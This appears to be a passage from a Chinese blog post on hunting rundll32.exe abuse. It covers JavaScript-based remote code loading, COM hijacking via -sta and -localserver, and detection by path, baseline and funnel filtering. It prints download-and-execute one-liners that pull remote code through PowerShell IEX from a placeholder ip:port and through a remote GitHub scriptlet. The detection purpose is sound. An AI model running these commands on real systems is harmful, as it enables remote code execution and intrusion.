除了本地加载之外,rundll32.exe 也可以通过 RunHtmlApplication 函数执行 JavaScript 以实现远程代码加载,例如:
— rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
— rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/XXX/XXX")
值得一提的是,根据笔者的观察,目前还没怎么看到日常活动中关于 javasciprt 关键字的合理使用场景,所以通常我会直接将该特征加入检测模型
想深入了解这一攻击手法,更多内容可以看看这篇文章
滥用COM组件关于 rundll32.exe 还有一些比较少见的命令行参数 ———— -sta 和 -localserver,它们俩都能用来加载恶意注册的 COM 组件
登上自家的 SIEM 去看看,说不定也能够发现以下活动(至少我确实根据相关数据狩猎到了一些有意思的活动:P)
— rundll32.exe –localserver <CLSID_GUID>
— rundll32.exe –sta <CLSID_GUID>
对 COM 组件不熟悉的童鞋可能需要先得去补补课,比如 ATT&CK 在持久化阶段中提及到的 T1546.015-Component Object Model Hijacking
简单来讲,当我们看到类似的命令行参数时,最好先去看看对应注册表下的键值对是否包含恶意的 DLL 文件或 SCT 脚本
它们通常在这个位置:\HKEY_CLASSES_ROOT\CLSID\<GUID>,可结合下图食用
关于具体的利用原理和攻击细节可以看看这里,还有这篇文章中提到的使用 -localserver 作为攻击变种的使用姿势
检测技巧命令行检测首先让我们一起回顾一遍 rundll32.exe 的基本使用方法:
— rundll32.exe <dllname>,<entrypoint> <optional arguments>
从 rundll32 的文件位置开始,我们可以设定一条最基础的检测规则,因为它通常只有以下两种选择:
- C:\Windows\System32\rundll32.exe
- C:\Windows\SysWOW64\rundll32.exe (32bit version on 64bit systems)
虽然简单,但也不并一定完全无用武之地:
接着,让我们开始关注 DLL 文件和导出函数
通过前文的介绍,我们应该能达成共识:在日常活动中,rundll32.exe 的出场次数并不少见
对于这种可能存在较多干扰信息的情况,我习惯使用漏斗模型来帮助缩小检测范围,简单来讲就是尽你所能(不一定非得用UEBA)去建设行为基线,然后剔除正常活动,重点关注偏离动作
例如,我顺手统计了下自己电脑上出现过的 DLl 文件和导出函数,实际应用时,可以采集足够多的良性样本,充实我们的白名单,或者借此优化采日志集策略
经过像漏斗思维一样的筛选,可以缩减我们的狩猎范围,更加聚焦于异常行为,从而提高狩猎的成功率
